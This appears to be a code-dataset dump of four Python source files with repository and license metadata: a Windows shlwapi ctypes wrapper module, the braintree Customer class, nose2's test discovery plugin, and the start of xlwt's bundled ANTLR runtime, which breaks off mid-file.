# );
def PathFindNextComponentA(pszPath):
_PathFindNextComponentA = windll.shlwapi.PathFindNextComponentA
_PathFindNextComponentA.argtypes = [LPSTR]
_PathFindNextComponentA.restype = LPSTR
pszPath = ctypes.create_string_buffer(pszPath)
return _PathFindNextComponentA(pszPath)
def PathFindNextComponentW(pszPath):
_PathFindNextComponentW = windll.shlwapi.PathFindNextComponentW
_PathFindNextComponentW.argtypes = [LPWSTR]
_PathFindNextComponentW.restype = LPWSTR
pszPath = ctypes.create_unicode_buffer(pszPath)
return _PathFindNextComponentW(pszPath)
PathFindNextComponent = GuessStringType(PathFindNextComponentA, PathFindNextComponentW)
# BOOL PathFindOnPath(
# LPTSTR pszFile,
# LPCTSTR *ppszOtherDirs
# );
def PathFindOnPathA(pszFile, ppszOtherDirs = None):
_PathFindOnPathA = windll.shlwapi.PathFindOnPathA
_PathFindOnPathA.argtypes = [LPSTR, LPSTR]
_PathFindOnPathA.restype = bool
pszFile = ctypes.create_string_buffer(pszFile, MAX_PATH)
if not ppszOtherDirs:
ppszOtherDirs = None
else:
szArray = ""
for pszOtherDirs in ppszOtherDirs:
if pszOtherDirs:
szArray = "%s%s\0" % (szArray, pszOtherDirs)
szArray = szArray + "\0"
pszOtherDirs = ctypes.create_string_buffer(szArray)
ppszOtherDirs = ctypes.pointer(pszOtherDirs)
if _PathFindOnPathA(pszFile, ppszOtherDirs):
return pszFile.value
return None
def PathFindOnPathW(pszFile, ppszOtherDirs = None):
_PathFindOnPathW = windll.shlwapi.PathFindOnPathA
_PathFindOnPathW.argtypes = [LPWSTR, LPWSTR]
_PathFindOnPathW.restype = bool
pszFile = ctypes.create_unicode_buffer(pszFile, MAX_PATH)
if not ppszOtherDirs:
ppszOtherDirs = None
else:
szArray = u""
for pszOtherDirs in ppszOtherDirs:
if pszOtherDirs:
szArray = u"%s%s\0" % (szArray, pszOtherDirs)
szArray = szArray + u"\0"
pszOtherDirs = ctypes.create_unicode_buffer(szArray)
ppszOtherDirs = ctypes.pointer(pszOtherDirs)
if _PathFindOnPathW(pszFile, ppszOtherDirs):
return pszFile.value
return None
PathFindOnPath = GuessStringType(PathFindOnPathA, PathFindOnPathW)
# LPTSTR PathGetArgs(
# LPCTSTR pszPath
# );
def PathGetArgsA(pszPath):
_PathGetArgsA = windll.shlwapi.PathGetArgsA
_PathGetArgsA.argtypes = [LPSTR]
_PathGetArgsA.restype = LPSTR
pszPath = ctypes.create_string_buffer(pszPath)
return _PathGetArgsA(pszPath)
def PathGetArgsW(pszPath):
_PathGetArgsW = windll.shlwapi.PathGetArgsW
_PathGetArgsW.argtypes = [LPWSTR]
_PathGetArgsW.restype = LPWSTR
pszPath = ctypes.create_unicode_buffer(pszPath)
return _PathGetArgsW(pszPath)
PathGetArgs = GuessStringType(PathGetArgsA, PathGetArgsW)
# BOOL PathIsContentType(
# LPCTSTR pszPath,
# LPCTSTR pszContentType
# );
def PathIsContentTypeA(pszPath, pszContentType):
_PathIsContentTypeA = windll.shlwapi.PathIsContentTypeA
_PathIsContentTypeA.argtypes = [LPSTR, LPSTR]
_PathIsContentTypeA.restype = bool
return _PathIsContentTypeA(pszPath, pszContentType)
def PathIsContentTypeW(pszPath, pszContentType):
_PathIsContentTypeW = windll.shlwapi.PathIsContentTypeW
_PathIsContentTypeW.argtypes = [LPWSTR, LPWSTR]
_PathIsContentTypeW.restype = bool
return _PathIsContentTypeW(pszPath, pszContentType)
PathIsContentType = GuessStringType(PathIsContentTypeA, PathIsContentTypeW)
# BOOL PathIsDirectory(
# LPCTSTR pszPath
# );
def PathIsDirectoryA(pszPath):
_PathIsDirectoryA = windll.shlwapi.PathIsDirectoryA
_PathIsDirectoryA.argtypes = [LPSTR]
_PathIsDirectoryA.restype = bool
return _PathIsDirectoryA(pszPath)
def PathIsDirectoryW(pszPath):
_PathIsDirectoryW = windll.shlwapi.PathIsDirectoryW
_PathIsDirectoryW.argtypes = [LPWSTR]
_PathIsDirectoryW.restype = bool
return _PathIsDirectoryW(pszPath)
PathIsDirectory = GuessStringType(PathIsDirectoryA, PathIsDirectoryW)
# BOOL PathIsDirectoryEmpty(
# LPCTSTR pszPath
# );
def PathIsDirectoryEmptyA(pszPath):
_PathIsDirectoryEmptyA = windll.shlwapi.PathIsDirectoryEmptyA
_PathIsDirectoryEmptyA.argtypes = [LPSTR]
_PathIsDirectoryEmptyA.restype = bool
return _PathIsDirectoryEmptyA(pszPath)
def PathIsDirectoryEmptyW(pszPath):
_PathIsDirectoryEmptyW = windll.shlwapi.PathIsDirectoryEmptyW
_PathIsDirectoryEmptyW.argtypes = [LPWSTR]
_PathIsDirectoryEmptyW.restype = bool
return _PathIsDirectoryEmptyW(pszPath)
PathIsDirectoryEmpty = GuessStringType(PathIsDirectoryEmptyA, PathIsDirectoryEmptyW)
# BOOL PathIsNetworkPath(
# LPCTSTR pszPath
# );
def PathIsNetworkPathA(pszPath):
_PathIsNetworkPathA = windll.shlwapi.PathIsNetworkPathA
_PathIsNetworkPathA.argtypes = [LPSTR]
_PathIsNetworkPathA.restype = bool
return _PathIsNetworkPathA(pszPath)
def PathIsNetworkPathW(pszPath):
_PathIsNetworkPathW = windll.shlwapi.PathIsNetworkPathW
_PathIsNetworkPathW.argtypes = [LPWSTR]
_PathIsNetworkPathW.restype = bool
return _PathIsNetworkPathW(pszPath)
PathIsNetworkPath = GuessStringType(PathIsNetworkPathA, PathIsNetworkPathW)
# BOOL PathIsRelative(
# LPCTSTR lpszPath
# );
def PathIsRelativeA(pszPath):
_PathIsRelativeA = windll.shlwapi.PathIsRelativeA
_PathIsRelativeA.argtypes = [LPSTR]
_PathIsRelativeA.restype = bool
return _PathIsRelativeA(pszPath)
def PathIsRelativeW(pszPath):
_PathIsRelativeW = windll.shlwapi.PathIsRelativeW
_PathIsRelativeW.argtypes = [LPWSTR]
_PathIsRelativeW.restype = bool
return _PathIsRelativeW(pszPath)
PathIsRelative = GuessStringType(PathIsRelativeA, PathIsRelativeW)
# BOOL PathIsRoot(
# LPCTSTR pPath
# );
def PathIsRootA(pszPath):
_PathIsRootA = windll.shlwapi.PathIsRootA
_PathIsRootA.argtypes = [LPSTR]
_PathIsRootA.restype = bool
return _PathIsRootA(pszPath)
def PathIsRootW(pszPath):
_PathIsRootW = windll.shlwapi.PathIsRootW
_PathIsRootW.argtypes = [LPWSTR]
_PathIsRootW.restype = bool
return _PathIsRootW(pszPath)
PathIsRoot = GuessStringType(PathIsRootA, PathIsRootW)
# BOOL PathIsSameRoot(
# LPCTSTR pszPath1,
# LPCTSTR pszPath2
# );
def PathIsSameRootA(pszPath1, pszPath2):
_PathIsSameRootA = windll.shlwapi.PathIsSameRootA
_PathIsSameRootA.argtypes = [LPSTR, LPSTR]
_PathIsSameRootA.restype = bool
return _PathIsSameRootA(pszPath1, pszPath2)
def PathIsSameRootW(pszPath1, pszPath2):
_PathIsSameRootW = windll.shlwapi.PathIsSameRootW
_PathIsSameRootW.argtypes = [LPWSTR, LPWSTR]
_PathIsSameRootW.restype = bool
return _PathIsSameRootW(pszPath1, pszPath2)
PathIsSameRoot = GuessStringType(PathIsSameRootA, PathIsSameRootW)
# BOOL PathIsUNC(
# LPCTSTR pszPath
# );
def PathIsUNCA(pszPath):
_PathIsUNCA = windll.shlwapi.PathIsUNCA
_PathIsUNCA.argtypes = [LPSTR]
_PathIsUNCA.restype = bool
return _PathIsUNCA(pszPath)
def PathIsUNCW(pszPath):
_PathIsUNCW = windll.shlwapi.PathIsUNCW
_PathIsUNCW.argtypes = [LPWSTR]
_PathIsUNCW.restype = bool
return _PathIsUNCW(pszPath)
PathIsUNC = GuessStringType(PathIsUNCA, PathIsUNCW)
# XXX WARNING
# PathMakePretty turns filenames into all lowercase.
# I'm not sure how well that might work on Wine.
# BOOL PathMakePretty(
# LPCTSTR pszPath
# );
def PathMakePrettyA(pszPath):
_PathMakePrettyA = windll.shlwapi.PathMakePrettyA
_PathMakePrettyA.argtypes = [LPSTR]
_PathMakePrettyA.restype = bool
_PathMakePrettyA.errcheck = RaiseIfZero
pszPath = ctypes.create_string_buffer(pszPath, MAX_PATH)
_PathMakePrettyA(pszPath)
return pszPath.value
def PathMakePrettyW(pszPath):
_PathMakePrettyW = windll.shlwapi.PathMakePrettyW
_PathMakePrettyW.argtypes = [LPWSTR]
_PathMakePrettyW.restype = bool
_PathMakePrettyW.errcheck = RaiseIfZero
pszPath = ctypes.create_unicode_buffer(pszPath, MAX_PATH)
_PathMakePrettyW(pszPath)
return pszPath.value
PathMakePretty = GuessStringType(PathMakePrettyA, PathMakePrettyW)
# void PathRemoveArgs(
# LPTSTR pszPath
# );
def PathRemoveArgsA(pszPath):
_PathRemoveArgsA = windll.shlwapi.PathRemoveArgsA
_PathRemoveArgsA.argtypes = [LPSTR]
pszPath = ctypes.create_string_buffer(pszPath, MAX_PATH)
_PathRemoveArgsA(pszPath)
return pszPath.value
def PathRemoveArgsW(pszPath):
_PathRemoveArgsW = windll.shlwapi.PathRemoveArgsW
_PathRemoveArgsW.argtypes = [LPWSTR]
pszPath = ctypes.create_unicode_buffer(pszPath, MAX_PATH)
_PathRemoveArgsW(pszPath)
return pszPath.value
PathRemoveArgs = GuessStringType(PathRemoveArgsA, PathRemoveArgsW)
# void PathRemoveBackslash(
# LPTSTR pszPath
# );
def PathRemoveBackslashA(pszPath):
_PathRemoveBackslashA = windll.shlwapi.PathRemoveBackslashA
_PathRemoveBackslashA.argtypes = [LPSTR]
pszPath = ctypes.create_string_buffer(pszPath, MAX_PATH)
_PathRemoveBackslashA(pszPath)
return pszPath.value
def PathRemoveBackslashW(pszPath):
_PathRemoveBackslashW = windll.shlwapi.PathRemoveBackslashW
_PathRemoveBackslashW.argtypes = [LPWSTR]
pszPath = ctypes.create_unicode_buffer(pszPath, MAX_PATH)
_PathRemoveBackslashW(pszPath)
return pszPath.value
PathRemoveBackslash = GuessStringType(PathRemoveBackslashA, PathRemoveBackslashW)
# void PathRemoveExtension(
# LPTSTR pszPath
# );
def PathRemoveExtensionA(pszPath):
_PathRemoveExtensionA = windll.shlwapi.PathRemoveExtensionA
_PathRemoveExtensionA.argtypes = [LPSTR]
pszPath = ctypes.create_string_buffer(pszPath, MAX_PATH)
_PathRemoveExtensionA(pszPath)
return pszPath.value
def PathRemoveExtensionW(pszPath):
_PathRemoveExtensionW = windll.shlwapi.PathRemoveExtensionW
_PathRemoveExtensionW.argtypes = [LPWSTR]
pszPath = ctypes.create_unicode_buffer(pszPath, MAX_PATH)
_PathRemoveExtensionW(pszPath)
return pszPath.value
PathRemoveExtension = GuessStringType(PathRemoveExtensionA, PathRemoveExtensionW)
# void PathRemoveFileSpec(
# LPTSTR pszPath
# );
def PathRemoveFileSpecA(pszPath):
_PathRemoveFileSpecA = windll.shlwapi.PathRemoveFileSpecA
_PathRemoveFileSpecA.argtypes = [LPSTR]
pszPath = ctypes.create_string_buffer(pszPath, MAX_PATH)
_PathRemoveFileSpecA(pszPath)
return pszPath.value
def PathRemoveFileSpecW(pszPath):
_PathRemoveFileSpecW = windll.shlwapi.PathRemoveFileSpecW
_PathRemoveFileSpecW.argtypes = [LPWSTR]
pszPath = ctypes.create_unicode_buffer(pszPath, MAX_PATH)
_PathRemoveFileSpecW(pszPath)
return pszPath.value
PathRemoveFileSpec = GuessStringType(PathRemoveFileSpecA, PathRemoveFileSpecW)
# BOOL PathRenameExtension(
# LPTSTR pszPath,
# LPCTSTR pszExt
# );
def PathRenameExtensionA(pszPath, pszExt):
_PathRenameExtensionA = windll.shlwapi.PathRenameExtensionA
_PathRenameExtensionA.argtypes = [LPSTR, LPSTR]
_PathRenameExtensionA.restype = bool
pszPath = ctypes.create_string_buffer(pszPath, MAX_PATH)
if _PathRenameExtensionA(pszPath, pszExt):
return pszPath.value
return None
def PathRenameExtensionW(pszPath, pszExt):
_PathRenameExtensionW = windll.shlwapi.PathRenameExtensionW
_PathRenameExtensionW.argtypes = [LPWSTR, LPWSTR]
_PathRenameExtensionW.restype = bool
pszPath = ctypes.create_unicode_buffer(pszPath, MAX_PATH)
if _PathRenameExtensionW(pszPath, pszExt):
return pszPath.value
return None
PathRenameExtension = GuessStringType(PathRenameExtensionA, PathRenameExtensionW)
# BOOL PathUnExpandEnvStrings(
# LPCTSTR pszPath,
# LPTSTR pszBuf,
# UINT cchBuf
# );
def PathUnExpandEnvStringsA(pszPath):
_PathUnExpandEnvStringsA = windll.shlwapi.PathUnExpandEnvStringsA
_PathUnExpandEnvStringsA.argtypes = [LPSTR, LPSTR]
_PathUnExpandEnvStringsA.restype = bool
_PathUnExpandEnvStringsA.errcheck = RaiseIfZero
cchBuf = MAX_PATH
pszBuf = ctypes.create_string_buffer("", cchBuf)
_PathUnExpandEnvStringsA(pszPath, pszBuf, cchBuf)
return pszBuf.value
def PathUnExpandEnvStringsW(pszPath):
_PathUnExpandEnvStringsW = windll.shlwapi.PathUnExpandEnvStringsW
_PathUnExpandEnvStringsW.argtypes = [LPWSTR, LPWSTR]
_PathUnExpandEnvStringsW.restype = bool
_PathUnExpandEnvStringsW.errcheck = RaiseIfZero
cchBuf = MAX_PATH
pszBuf = ctypes.create_unicode_buffer(u"", cchBuf)
_PathUnExpandEnvStringsW(pszPath, pszBuf, cchBuf)
return pszBuf.value
PathUnExpandEnvStrings = GuessStringType(PathUnExpandEnvStringsA, PathUnExpandEnvStringsW)
#==============================================================================
# This calculates the list of exported symbols.
_all = set(vars().keys()).difference(_all)
__all__ = [_x for _x in _all if not _x.startswith('_')]
__all__.sort()
#==============================================================================
| apache-2.0 |
DiptoDas8/Biponi | lib/python2.7/site-packages/braintree/customer.py | 4 | 8252 | import warnings
from braintree.util.http import Http
from braintree.successful_result import SuccessfulResult
from braintree.error_result import ErrorResult
from braintree.resource import Resource
from braintree.apple_pay_card import ApplePayCard
from braintree.android_pay_card import AndroidPayCard
from braintree.credit_card import CreditCard
from braintree.paypal_account import PayPalAccount
from braintree.europe_bank_account import EuropeBankAccount
from braintree.coinbase_account import CoinbaseAccount
from braintree.address import Address
from braintree.configuration import Configuration
from braintree.ids_search import IdsSearch
from braintree.exceptions.not_found_error import NotFoundError
from braintree.resource_collection import ResourceCollection
from braintree.transparent_redirect import TransparentRedirect
class Customer(Resource):
"""
A class representing a customer.
An example of creating an customer with all available fields::
result = braintree.Customer.create({
"id": "my_customer_id",
"company": "Some company",
"email": "john.doe@example.com",
"fax": "123-555-1212",
"first_name": "John",
"last_name": "Doe",
"phone": "123-555-1221",
"website": "http://www.example.com",
"credit_card": {
"cardholder_name": "John Doe",
"cvv": "123",
"expiration_date": "12/2012",
"number": "4111111111111111",
"token": "my_token",
"billing_address": {
"first_name": "John",
"last_name": "Doe",
"company": "Braintree",
"street_address": "111 First Street",
"extended_address": "Unit 1",
"locality": "Chicago",
"postal_code": "60606",
"region": "IL",
"country_name": "United States of America"
},
"options": {
"verify_card": True
}
},
"custom_fields": {
"my_key": "some value"
}
})
print(result.customer.id)
print(result.customer.first_name)
For more information on Customers, see https://developers.braintreepayments.com/ios+python/reference/request/customer/create
"""
def __repr__(self):
detail_list = ["first_name", "last_name", "id"]
return super(Customer, self).__repr__(detail_list)
@staticmethod
def all():
""" Return a collection of all customers. """
return Configuration.gateway().customer.all()
@staticmethod
def confirm_transparent_redirect(query_string):
"""
Confirms a transparent redirect request. It expects the query string from the
redirect request. The query string should _not_ include the leading "?" character. ::
result = braintree.Customer.confirm_transparent_redirect_request("foo=bar&id=12345")
"""
warnings.warn("Please use TransparentRedirect.confirm instead", DeprecationWarning)
return Configuration.gateway().customer.confirm_transparent_redirect(query_string)
@staticmethod
def create(params={}):
"""
Create a Customer
No field is required::
result = braintree.Customer.create({
"company": "Some company",
"first_name": "John"
})
"""
return Configuration.gateway().customer.create(params)
@staticmethod
def delete(customer_id):
"""
Delete a customer
Given a customer_id::
result = braintree.Customer.delete("my_customer_id")
"""
return Configuration.gateway().customer.delete(customer_id)
@staticmethod
def find(customer_id):
"""
Find an customer, given a customer_id. This does not return a result
object. This will raise a :class:`NotFoundError <braintree.exceptions.not_found_error.NotFoundError>` if the provided customer_id
is not found. ::
customer = braintree.Customer.find("my_customer_id")
"""
return Configuration.gateway().customer.find(customer_id)
@staticmethod
def search(*query):
return Configuration.gateway().customer.search(*query)
@staticmethod
def tr_data_for_create(tr_data, redirect_url):
""" Builds tr_data for creating a Customer. """
return Configuration.gateway().customer.tr_data_for_create(tr_data, redirect_url)
@staticmethod
def tr_data_for_update(tr_data, redirect_url):
""" Builds tr_data for updating a Customer. """
return Configuration.gateway().customer.tr_data_for_update(tr_data, redirect_url)
@staticmethod
def transparent_redirect_create_url():
""" Returns the url to use for creating Customers through transparent redirect. """
warnings.warn("Please use TransparentRedirect.url instead", DeprecationWarning)
return Configuration.gateway().customer.transparent_redirect_create_url()
@staticmethod
def transparent_redirect_update_url():
""" Returns the url to use for updating Customers through transparent redirect. """
warnings.warn("Please use TransparentRedirect.url instead", DeprecationWarning)
return Configuration.gateway().customer.transparent_redirect_update_url()
@staticmethod
def update(customer_id, params={}):
"""
Update an existing Customer
By customer_id. The params are similar to create::
result = braintree.Customer.update("my_customer_id", {
"last_name": "Smith"
})
"""
return Configuration.gateway().customer.update(customer_id, params)
@staticmethod
def create_signature():
return [
"company", "email", "fax", "first_name", "id", "last_name", "phone", "website", "device_data", "device_session_id", "fraud_merchant_id", "payment_method_nonce",
{"credit_card": CreditCard.create_signature()},
{"custom_fields": ["__any_key__"]}
]
@staticmethod
def update_signature():
return [
"company", "email", "fax", "first_name", "id", "last_name", "phone", "website", "device_data", "device_session_id", "fraud_merchant_id", "payment_method_nonce",
{"credit_card": CreditCard.signature("update_via_customer")},
{"custom_fields": ["__any_key__"]}
]
def __init__(self, gateway, attributes):
Resource.__init__(self, gateway, attributes)
self.payment_methods = []
if "credit_cards" in attributes:
self.credit_cards = [CreditCard(gateway, credit_card) for credit_card in self.credit_cards]
self.payment_methods += self.credit_cards
if "addresses" in attributes:
self.addresses = [Address(gateway, address) for address in self.addresses]
if "paypal_accounts" in attributes:
self.paypal_accounts = [PayPalAccount(gateway, paypal_account) for paypal_account in self.paypal_accounts]
self.payment_methods += self.paypal_accounts
if "apple_pay_cards" in attributes:
self.apple_pay_cards = [ApplePayCard(gateway, apple_pay_card) for apple_pay_card in self.apple_pay_cards]
self.payment_methods += self.apple_pay_cards
if "android_pay_cards" in attributes:
self.android_pay_cards = [AndroidPayCard(gateway, android_pay_card) for android_pay_card in self.android_pay_cards]
self.payment_methods += self.android_pay_cards
if "europe_bank_accounts" in attributes:
self.europe_bank_accounts = [EuropeBankAccount(gateway, europe_bank_account) for europe_bank_account in self.europe_bank_accounts]
self.payment_methods += self.europe_bank_accounts
if "coinbase_accounts" in attributes:
self.coinbase_accounts = [CoinbaseAccount(gateway, coinbase_account) for coinbase_account in self.coinbase_accounts]
self.payment_methods += self.coinbase_accounts
| mit |
ptthiem/nose2 | nose2/plugins/loader/discovery.py | 2 | 9459 | """
Discovery-based test loader.
This plugin implements nose2's automatic test module discovery. It
looks for test modules in packages and directories whose names start
with ``test``, then fires the :func:`loadTestsFromModule` hook for each
one to allow other plugins to load the actual tests.
It also fires :func:`handleFile` for every file that it sees, and
:func:`matchPath` for every Python module, to allow other plugins to
load tests from other kinds of files and to influence which modules
are examined for tests.
"""
# Adapted from unittest2/loader.py from the unittest2 plugins branch.
# This module contains some code copied from unittest2/loader.py and other
# code developed in reference to that module and others within unittest2.
# unittest2 is Copyright (c) 2001-2010 Python Software Foundation; All
# Rights Reserved. See: http://docs.python.org/license.html
from fnmatch import fnmatch
import logging
import os
import sys
from nose2 import events, util
__unittest = True
log = logging.getLogger(__name__)
class DirectoryHandler(object):
def __init__(self, session):
self.session = session
self.event_handled = False
def handle_dir(self, event, full_path, top_level):
dirname = os.path.basename(full_path)
pattern = self.session.testFilePattern
evt = events.HandleFileEvent(
event.loader, dirname, full_path, pattern, top_level)
result = self.session.hooks.handleDir(evt)
if evt.extraTests:
for test in evt.extraTests:
yield test
if evt.handled:
if result:
yield result
self.event_handled = True
return
evt = events.MatchPathEvent(dirname, full_path, pattern)
result = self.session.hooks.matchDirPath(evt)
if evt.handled and not result:
self.event_handled = True
class Discoverer(object):
def loadTestsFromName(self, event):
"""Load tests from module named by event.name"""
# turn name into path or module name
# fire appropriate hooks (handle file or load from module)
if event.module:
return
name = event.name
module = None
_, top_level_dir = self._getStartDirs()
try:
# try name as a dotted module name first
__import__(name)
module = sys.modules[name]
except (KeyboardInterrupt, SystemExit):
raise
except:
# if that fails, try it as a file or directory
event.extraTests.extend(
self._find_tests(event, name, top_level_dir))
else:
event.extraTests.extend(
self._find_tests_in_module(event, module, top_level_dir))
def loadTestsFromNames(self, event):
"""Discover tests if no test names specified"""
log.debug("Received event %s", event)
if event.names or event.module:
return
event.handled = True # I will handle discovery
return self._discover(event)
def _checkIfPathIsOK(self, start_dir):
if not os.path.isdir(os.path.abspath(start_dir)):
raise OSError("%s is not a directory" % os.path.abspath(start_dir))
def _getStartDirs(self):
start_dir = self.session.startDir
top_level_dir = self.session.topLevelDir
if start_dir is None:
start_dir = '.'
if top_level_dir is None:
top_level_dir = start_dir
self._checkIfPathIsOK(start_dir)
is_not_importable = False
start_dir = os.path.abspath(start_dir)
top_level_dir = os.path.abspath(top_level_dir)
if start_dir != top_level_dir:
is_not_importable = not os.path.isfile(
os.path.join(start_dir, '__init__.py'))
if is_not_importable:
raise ImportError(
'Start directory is not importable: %r' % start_dir)
# this is redundant in some cases, but that's ok
self.session.prepareSysPath()
return start_dir, top_level_dir
def _discover(self, event):
loader = event.loader
try:
start_dir, top_level_dir = self._getStartDirs()
except (OSError, ImportError):
return loader.suiteClass(
loader.failedLoadTests(self.session.startDir, sys.exc_info()))
log.debug("_discover in %s (%s)", start_dir, top_level_dir)
tests = list(self._find_tests(event, start_dir, top_level_dir))
return loader.suiteClass(tests)
def _find_tests(self, event, start, top_level):
"""Used by discovery. Yields test suites it loads."""
log.debug('_find_tests(%r, %r)', start, top_level)
if start == top_level:
full_path = start
else:
full_path = os.path.join(top_level, start)
if os.path.isdir(start):
for test in self._find_tests_in_dir(
event, full_path, top_level):
yield test
elif os.path.isfile(start):
for test in self._find_tests_in_file(
event, start, full_path, top_level):
yield test
def _find_tests_in_dir(self, event, full_path, top_level):
if not os.path.isdir(full_path):
return
log.debug("find in dir %s (%s)", full_path, top_level)
dir_handler = DirectoryHandler(self.session)
for test in dir_handler.handle_dir(event, full_path, top_level):
yield test
if dir_handler.event_handled:
return
for path in os.listdir(full_path):
entry_path = os.path.join(full_path, path)
if os.path.isfile(entry_path):
for test in self._find_tests_in_file(
event, path, entry_path, top_level):
yield test
elif os.path.isdir(entry_path):
if ('test' in path.lower()
or util.ispackage(entry_path)
or path in self.session.libDirs):
for test in self._find_tests(event, entry_path, top_level):
yield test
def _find_tests_in_file(self, event, filename, full_path, top_level, module_name=None):
log.debug("find in file %s (%s)", full_path, top_level)
pattern = self.session.testFilePattern
loader = event.loader
evt = events.HandleFileEvent(
loader, filename, full_path, pattern, top_level)
result = self.session.hooks.handleFile(evt)
if evt.extraTests:
yield loader.suiteClass(evt.extraTests)
if evt.handled:
if result:
yield result
return
if not util.valid_module_name(filename):
# valid Python identifiers only
return
evt = events.MatchPathEvent(filename, full_path, pattern)
result = self.session.hooks.matchPath(evt)
if evt.handled:
if not result:
return
elif not self._match_path(filename, full_path, pattern):
return
if module_name is None:
module_name, package_path = util.name_from_path(full_path)
util.ensure_importable(package_path)
try:
module = util.module_from_name(module_name)
except:
yield loader.failedImport(module_name)
else:
mod_file = os.path.abspath(
getattr(module, '__file__', full_path))
realpath = os.path.splitext(mod_file)[0]
fullpath_noext = os.path.splitext(full_path)[0]
if realpath.lower() != fullpath_noext.lower():
module_dir = os.path.dirname(realpath)
mod_name = os.path.splitext(os.path.basename(full_path))[0]
expected_dir = os.path.dirname(full_path)
msg = ("%r module incorrectly imported from %r. "
"Expected %r. Is this module globally installed?"
)
raise ImportError(
msg % (mod_name, module_dir, expected_dir))
yield loader.loadTestsFromModule(module)
def _find_tests_in_module(self, event, module, top_level_dir):
# only called from loadTestsFromName
yield event.loader.loadTestsFromModule(module)
# may be a package; recurse into __path__ if so
pkgpath = getattr(module, '__path__', None)
if pkgpath:
for entry in pkgpath:
full_path = os.path.abspath(os.path.join(top_level_dir, entry))
for test in self._find_tests_in_dir(
event, full_path, top_level_dir):
yield test
def _match_path(self, path, full_path, pattern):
# override this method to use alternative matching strategy
return fnmatch(path, pattern)
class DiscoveryLoader(events.Plugin, Discoverer):
"""Loader plugin that can discover tests"""
alwaysOn = True
configSection = 'discovery'
def registerInSubprocess(self, event):
event.pluginClasses.append(self.__class__)
def loadTestsFromName(self, event):
"""Load tests from module named by event.name"""
return Discoverer.loadTestsFromName(self, event)
def loadTestsFromNames(self, event):
"""Discover tests if no test names specified"""
return Discoverer.loadTestsFromNames(self, event)
| bsd-2-clause |
x303597316/hue | desktop/core/ext-py/tablib-0.10.0/tablib/packages/xlwt/antlr.py | 57 | 84201 | ## This file is part of PyANTLR. See LICENSE.txt for license
## details..........Copyright (C) Wolfgang Haefelinger, 2004.
## This file was copied for use with xlwt from the 2.7.7 ANTLR distribution. Yes, it
## says 2.7.5 below. The 2.7.5 distribution version didn't have a
## version in it.
## Here is the contents of the ANTLR 2.7.7 LICENSE.txt referred to above.
# SOFTWARE RIGHTS
#
# ANTLR 1989-2006 Developed by Terence Parr
# Partially supported by University of San Francisco & jGuru.com
#
# We reserve no legal rights to the ANTLR--it is fully in the
# public domain. An individual or company may do whatever
# they wish with source code distributed with ANTLR or the
# code generated by ANTLR, including the incorporation of
# ANTLR, or its output, into commerical software.
#
# We encourage users to develop software with ANTLR. However,
# we do ask that credit is given to us for developing
# ANTLR. By "credit", we mean that if you use ANTLR or
# incorporate any source code into one of your programs
# (commercial product, research project, or otherwise) that
# you acknowledge this fact somewhere in the documentation,
# research report, etc... If you like ANTLR and have
# developed a nice tool with the output, please mention that
# you developed it using ANTLR. In addition, we ask that the
# headers remain intact in our source code. As long as these
# guidelines are kept, we expect to continue enhancing this
# system and expect to make other tools available as they are
# completed.
#
# The primary ANTLR guy:
#
# Terence Parr
# parrt@cs.usfca.edu
# parrt@antlr.org
## End of contents of the ANTLR 2.7.7 LICENSE.txt ########################
## get sys module
import sys
version = sys.version.split()[0]
if version < '2.2.1':
False = 0
if version < '2.3':
True = not False
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### global symbols ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### ANTLR Standard Tokens
SKIP = -1
INVALID_TYPE = 0
EOF_TYPE = 1
EOF = 1
NULL_TREE_LOOKAHEAD = 3
MIN_USER_TYPE = 4
### ANTLR's EOF Symbol
EOF_CHAR = ''
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### general functions ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
## Version should be automatically derived from configure.in. For now,
## we need to bump it ourselfs. Don't remove the <version> tags.
## <version>
def version():
r = {
'major' : '2',
'minor' : '7',
'micro' : '5',
'patch' : '' ,
'version': '2.7.5'
}
return r
## </version>
def error(fmt,*args):
if fmt:
print "error: ", fmt % tuple(args)
def ifelse(cond,_then,_else):
if cond :
r = _then
else:
r = _else
return r
def is_string_type(x):
# return (isinstance(x,str) or isinstance(x,unicode))
# Simplify; xlwt doesn't support Python < 2.3
return isinstance(basestring)
def assert_string_type(x):
assert is_string_type(x)
pass
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### ANTLR Exceptions ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class ANTLRException(Exception):
def __init__(self, *args):
Exception.__init__(self, *args)
class RecognitionException(ANTLRException):
def __init__(self, *args):
ANTLRException.__init__(self, *args)
self.fileName = None
self.line = -1
self.column = -1
if len(args) >= 2:
self.fileName = args[1]
if len(args) >= 3:
self.line = args[2]
if len(args) >= 4:
self.column = args[3]
def __str__(self):
buf = ['']
if self.fileName:
buf.append(self.fileName + ":")
if self.line != -1:
if not self.fileName:
buf.append("line ")
buf.append(str(self.line))
if self.column != -1:
buf.append(":" + str(self.column))
buf.append(":")
buf.append(" ")
return str('').join(buf)
__repr__ = __str__
class NoViableAltException(RecognitionException):
def __init__(self, *args):
RecognitionException.__init__(self, *args)
self.token = None
self.node = None
if isinstance(args[0],AST):
self.node = args[0]
elif isinstance(args[0],Token):
self.token = args[0]
else:
raise TypeError("NoViableAltException requires Token or AST argument")
def __str__(self):
if self.token:
line = self.token.getLine()
col = self.token.getColumn()
text = self.token.getText()
return "unexpected symbol at line %s (column %s): \"%s\"" % (line,col,text)
if self.node == ASTNULL:
return "unexpected end of subtree"
assert self.node
### hackish, we assume that an AST contains method getText
return "unexpected node: %s" % (self.node.getText())
__repr__ = __str__
class NoViableAltForCharException(RecognitionException):
def __init__(self, *args):
self.foundChar = None
if len(args) == 2:
self.foundChar = args[0]
scanner = args[1]
RecognitionException.__init__(self, "NoViableAlt",
scanner.getFilename(),
scanner.getLine(),
scanner.getColumn())
elif len(args) == 4:
self.foundChar = args[0]
fileName = args[1]
line = args[2]
column = args[3]
RecognitionException.__init__(self, "NoViableAlt",
fileName, line, column)
else:
RecognitionException.__init__(self, "NoViableAlt",
